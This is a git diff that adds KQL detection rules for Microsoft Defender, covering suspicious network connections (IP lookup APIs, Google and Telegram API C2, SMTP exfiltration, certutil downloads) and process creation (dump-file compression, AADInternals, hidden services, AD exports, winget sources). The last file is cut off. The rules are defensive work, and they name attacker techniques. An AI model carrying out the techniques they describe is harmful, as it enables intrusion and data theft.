index 00000000..4fe0bd62
--- /dev/null
+++ b/KQL/rules/windows/network_connection/suspicious_network_connection_binary_no_commandline.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Network Connection Binary No CommandLine
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-03
+// Level: high
+// Description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceNetworkEvents
+| where ((InitiatingProcessCommandLine endswith "\\regsvr32.exe" or InitiatingProcessCommandLine endswith "\\rundll32.exe" or InitiatingProcessCommandLine endswith "\\dllhost.exe") and (InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/suspicious_network_connection_to_ip_lookup_service_apis.kql b/KQL/rules/windows/network_connection/suspicious_network_connection_to_ip_lookup_service_apis.kql
new file mode 100644
index 00000000..8af365a5
--- /dev/null
+++ b/KQL/rules/windows/network_connection/suspicious_network_connection_to_ip_lookup_service_apis.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Network Connection to IP Lookup Service APIs
+// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-24
+// Level: medium
+// Description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+//   - Legitimate use of the external websites for troubleshooting or network monitoring
+
+DeviceNetworkEvents
+| where ((RemoteUrl in~ ("www.ip.cn", "l2.io")) or (RemoteUrl contains "api.2ip.ua" or RemoteUrl contains "api.bigdatacloud.net" or RemoteUrl contains "api.ipify.org" or RemoteUrl contains "bot.whatismyipaddress.com" or RemoteUrl contains "canireachthe.net" or RemoteUrl contains "checkip.amazonaws.com" or RemoteUrl contains "checkip.dyndns.org" or RemoteUrl contains "curlmyip.com" or RemoteUrl contains "db-ip.com" or RemoteUrl contains "edns.ip-api.com" or RemoteUrl contains "eth0.me" or RemoteUrl contains "freegeoip.app" or RemoteUrl contains "geoipy.com" or RemoteUrl contains "getip.pro" or RemoteUrl contains "icanhazip.com" or RemoteUrl contains "ident.me" or RemoteUrl contains "ifconfig.io" or RemoteUrl contains "ifconfig.me" or RemoteUrl contains "ip-api.com" or RemoteUrl contains "ip.360.cn" or RemoteUrl contains "ip.anysrc.net" or RemoteUrl contains "ip.taobao.com" or RemoteUrl contains "ip.tyk.nu" or RemoteUrl contains "ipaddressworld.com" or RemoteUrl contains "ipapi.co" or RemoteUrl contains "ipconfig.io" or RemoteUrl contains "ipecho.net" or RemoteUrl contains "ipinfo.io" or RemoteUrl contains "ipip.net" or RemoteUrl contains "ipof.in" or RemoteUrl contains "ipv4.icanhazip.com" or RemoteUrl contains "ipv4bot.whatismyipaddress.com" or RemoteUrl contains "ipv6-test.com" or RemoteUrl contains "ipwho.is" or RemoteUrl contains "jsonip.com" or RemoteUrl contains "myexternalip.com" or RemoteUrl contains "seeip.org" or RemoteUrl contains "wgetip.com" or RemoteUrl contains "whatismyip.akamai.com" or RemoteUrl contains "whois.pconline.com.cn" or RemoteUrl contains "wtfismyip.com")) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_google_api.kql b/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_google_api.kql
new file mode 100644
index 00000000..bc7155c4
--- /dev/null
+++ b/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_google_api.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Non-Browser Network Communication With Google API
+// Author: Gavin Knapp
+// Date: 2023-05-01
+// Level: medium
+// Description: Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102
+// False Positives:
+//   - Legitimate applications communicating with the "googleapis.com" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning.
+
+DeviceNetworkEvents
+| where (RemoteUrl contains "drive.googleapis.com" or RemoteUrl contains "oauth2.googleapis.com" or RemoteUrl contains "sheets.googleapis.com" or RemoteUrl contains "www.googleapis.com") and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath endswith ":\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or (InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe")) or ((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft\\EdgeCore\\") and (InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe")) or (InitiatingProcessFolderPath endswith ":\\Program Files\\Mozilla Firefox\\firefox.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") or (InitiatingProcessFolderPath contains ":\\Program Files\\Google\\Drive File Stream\\" and InitiatingProcessFolderPath endswith "\\GoogleDriveFS.exe") or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or (InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Internet Explorer\\iexplore.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Internet Explorer\\iexplore.exe") or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_telegram_api.kql b/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_telegram_api.kql
new file mode 100644
index 00000000..9fbe84a1
--- /dev/null
+++ b/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_telegram_api.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Non-Browser Network Communication With Telegram API
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-19
+// Level: medium
+// Description: Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.exfiltration, attack.t1102, attack.t1567, attack.t1105
+// False Positives:
+//   - Legitimate applications communicating with the Telegram API e.g. web browsers not in the exclusion list, app with an RSS  etc.
+
+DeviceNetworkEvents
+| where RemoteUrl contains "api.telegram.org" and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/suspicious_outbound_smtp_connections.kql b/KQL/rules/windows/network_connection/suspicious_outbound_smtp_connections.kql
new file mode 100644
index 00000000..c2d29199
--- /dev/null
+++ b/KQL/rules/windows/network_connection/suspicious_outbound_smtp_connections.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Outbound SMTP Connections
+// Author: frack113
+// Date: 2022-01-07
+// Level: medium
+// Description: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
+// The data may also be sent to an alternate network location from the main command and control server.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.003
+// False Positives:
+//   - Other SMTP tools
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("25", "587", "465", "2525")) and (not(((InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe") or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\" or (InitiatingProcessFolderPath endswith "\\HxTsr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/suspicious_wordpad_outbound_connections.kql b/KQL/rules/windows/network_connection/suspicious_wordpad_outbound_connections.kql
new file mode 100644
index 00000000..6cffef56
--- /dev/null
+++ b/KQL/rules/windows/network_connection/suspicious_wordpad_outbound_connections.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Wordpad Outbound Connections
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-12
+// Level: medium
+// Description: Detects a network connection initiated by "wordpad.exe" over uncommon destination ports.
+// This might indicate potential process injection activity from a beacon or similar mechanisms.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control
+// False Positives:
+//   - Other ports can be used, apply additional filters accordingly
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\wordpad.exe" and (not((RemotePort in~ ("80", "139", "443", "445", "465", "587", "993", "995"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/uncommon_connection_to_active_directory_web_services.kql b/KQL/rules/windows/network_connection/uncommon_connection_to_active_directory_web_services.kql
new file mode 100644
index 00000000..fa897cb6
--- /dev/null
+++ b/KQL/rules/windows/network_connection/uncommon_connection_to_active_directory_web_services.kql
@@ -0,0 +1,12 @@
+// Title: Uncommon Connection to Active Directory Web Services
+// Author: @kostastsale
+// Date: 2024-01-26
+// Level: medium
+// Description: Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087
+// False Positives:
+//   - ADWS is used by a number of legitimate applications that need to interact with Active Directory. These applications should be added to the allow-listing to avoid false positives.
+
+DeviceNetworkEvents
+| where RemotePort == 9389 and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\dsac.exe" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Microsoft Monitoring Agent\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.ex" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\WindowsPowerShell\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/uncommon_network_connection_initiated_by_certutil_exe.kql b/KQL/rules/windows/network_connection/uncommon_network_connection_initiated_by_certutil_exe.kql
new file mode 100644
index 00000000..2b12190b
--- /dev/null
+++ b/KQL/rules/windows/network_connection/uncommon_network_connection_initiated_by_certutil_exe.kql
@@ -0,0 +1,11 @@
+// Title: Uncommon Network Connection Initiated By Certutil.EXE
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-09-02
+// Level: high
+// Description: Detects a network connection initiated by the certutil.exe utility.
+// Attackers can abuse the utility in order to download malware or additional payloads.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("80", "135", "443", "445")) and InitiatingProcessFolderPath endswith "\\certutil.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/uncommon_outbound_kerberos_connection.kql b/KQL/rules/windows/network_connection/uncommon_outbound_kerberos_connection.kql
new file mode 100644
index 00000000..a462c4d5
--- /dev/null
+++ b/KQL/rules/windows/network_connection/uncommon_outbound_kerberos_connection.kql
@@ -0,0 +1,12 @@
+// Title: Uncommon Outbound Kerberos Connection
+// Author: Ilyas Ochkov, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1558, attack.lateral-movement, attack.t1550.003
+// False Positives:
+//   - Web Browsers and third party application might generate similar activity. An initial baseline is required.
+
+DeviceNetworkEvents
+| where RemotePort == 88 and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or InitiatingProcessFolderPath endswith "\\tomcat\\bin\\tomcat8.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/7zip_compressing_dump_files.kql b/KQL/rules/windows/process_creation/7zip_compressing_dump_files.kql
new file mode 100644
index 00000000..97b1da0f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/7zip_compressing_dump_files.kql
@@ -0,0 +1,13 @@
+// Title: 7Zip Compressing Dump Files
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-27
+// Level: medium
+// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+//   - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally
+//   - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/aadinternals_powershell_cmdlets_execution_proccesscreation.kql b/KQL/rules/windows/process_creation/aadinternals_powershell_cmdlets_execution_proccesscreation.kql
new file mode 100644
index 00000000..2c8d2c8b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/aadinternals_powershell_cmdlets_execution_proccesscreation.kql
@@ -0,0 +1,12 @@
+// Title: AADInternals PowerShell Cmdlets Execution - ProccessCreation
+// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2022-12-23
+// Level: high
+// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential-access, attack.impact
+// False Positives:
+//   - Legitimate use of the library for administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Find-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Initialize-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Reset-AADInt" or ProcessCommandLine contains "Resolve-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Save-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Unprotect-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/abuse_of_service_permissions_to_hide_services_via_set_service.kql b/KQL/rules/windows/process_creation/abuse_of_service_permissions_to_hide_services_via_set_service.kql
new file mode 100644
index 00000000..c2418e3b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/abuse_of_service_permissions_to_hide_services_via_set_service.kql
@@ -0,0 +1,12 @@
+// Title: Abuse of Service Permissions to Hide Services Via Set-Service
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-17
+// Level: high
+// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+// False Positives:
+//   - Rare intended use of hidden services
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/abused_debug_privilege_by_arbitrary_parent_processes.kql b/KQL/rules/windows/process_creation/abused_debug_privilege_by_arbitrary_parent_processes.kql
new file mode 100644
index 00000000..b20ff3c4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/abused_debug_privilege_by_arbitrary_parent_processes.kql
@@ -0,0 +1,10 @@
+// Title: Abused Debug Privilege by Arbitrary Parent Processes
+// Author: Semanur Guneysu @semanurtg, oscd.community
+// Date: 2020-10-28
+// Level: high
+// Description: Detection of unusual child processes by different system processes
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "Cmd.Exe"))) and ((InitiatingProcessFolderPath endswith "\\winlogon.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains " route " and ProcessCommandLine contains " ADD ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/abusing_print_executable.kql b/KQL/rules/windows/process_creation/abusing_print_executable.kql
new file mode 100644
index 00000000..c6fb01db
--- /dev/null
+++ b/KQL/rules/windows/process_creation/abusing_print_executable.kql
@@ -0,0 +1,10 @@
+// Title: Abusing Print Executable
+// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
+// Date: 2020-10-05
+// Level: medium
+// Description: Attackers can use print.exe for remote file copy
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/D" and ProcessCommandLine contains ".exe") and ProcessCommandLine startswith "print" and FolderPath endswith "\\print.exe") and (not(ProcessCommandLine contains "print.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/windows/process_creation/active_directory_database_snapshot_via_adexplorer.kql
new file mode 100644
index 00000000..f408fd67
--- /dev/null
+++ b/KQL/rules/windows/process_creation/active_directory_database_snapshot_via_adexplorer.kql
@@ -0,0 +1,10 @@
+// Title: Active Directory Database Snapshot Via ADExplorer
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: medium
+// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "snapshot" and ((FolderPath endswith "\\ADExp.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADExplorer64a.exe") or ProcessVersionInfoOriginalFileName =~ "AdExp" or ProcessVersionInfoFileDescription =~ "Active Directory Editor" or ProcessVersionInfoProductName =~ "Sysinternals ADExplorer")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/active_directory_structure_export_via_csvde_exe.kql b/KQL/rules/windows/process_creation/active_directory_structure_export_via_csvde_exe.kql
new file mode 100644
index 00000000..760ddca2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/active_directory_structure_export_via_csvde_exe.kql
@@ -0,0 +1,10 @@
+// Title: Active Directory Structure Export Via Csvde.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: medium
+// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.discovery, attack.t1087.002
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\csvde.exe" or ProcessVersionInfoOriginalFileName =~ "csvde.exe") and ProcessCommandLine contains " -f") and (not(ProcessCommandLine contains " -i"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/active_directory_structure_export_via_ldifde_exe.kql b/KQL/rules/windows/process_creation/active_directory_structure_export_via_ldifde_exe.kql
new file mode 100644
index 00000000..7867876f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/active_directory_structure_export_via_ldifde_exe.kql
@@ -0,0 +1,10 @@
+// Title: Active Directory Structure Export Via Ldifde.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: medium
+// Description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-f" and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")) and (not(ProcessCommandLine contains " -i"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/add_insecure_download_source_to_winget.kql b/KQL/rules/windows/process_creation/add_insecure_download_source_to_winget.kql
new file mode 100644
index 00000000..e6f05bb3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/add_insecure_download_source_to_winget.kql
@@ -0,0 +1,13 @@
+// Title: Add Insecure Download Source To Winget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: high
+// Description: Detects usage of winget to add a new insecure (http) download source.
+// Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+// False Positives:
+//   - False positives might occur if the users are unaware of such control checks
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add " and ProcessCommandLine contains "http://") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/add_new_download_source_to_winget.kql b/KQL/rules/windows/process_creation/add_new_download_source_to_winget.kql
new file mode 100644
index 00000000..e2f2f08a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/add_new_download_source_to_winget.kql
@@ -0,0 +1,12 @@
+// Title: Add New Download Source To Winget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: medium
+// Description: Detects usage of winget to add new additional download sources
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+// False Positives:
+//   - False positive are expected with legitimate sources
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/add_potential_suspicious_new_download_source_to_winget.kql b/KQL/rules/windows/process_creation/add_potential_suspicious_new_download_source_to_winget.kql
new file mode 100644
index 00000000..aab102c7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/add_potential_suspicious_new_download_source_to_winget.kql
@@ -0,0 +1,10 @@
+// Title: Add Potential Suspicious New Download Source To Winget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: medium
+// Description: Detects usage of winget to add new potentially suspicious download sources
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/add_safeboot_keys_via_reg_utility.kql b/KQL/rules/windows/process_creation/add_safeboot_keys_via_reg_utility.kql
new file mode 100644
index 00000000..dcc7fd44
--- /dev/null
+++ b/KQL/rules/windows/process_creation/add_safeboot_keys_via_reg_utility.kql
@@ -0,0 +1,12 @@
+// Title: Add SafeBoot Keys Via Reg Utility
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-02
+// Level: high
+// Description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
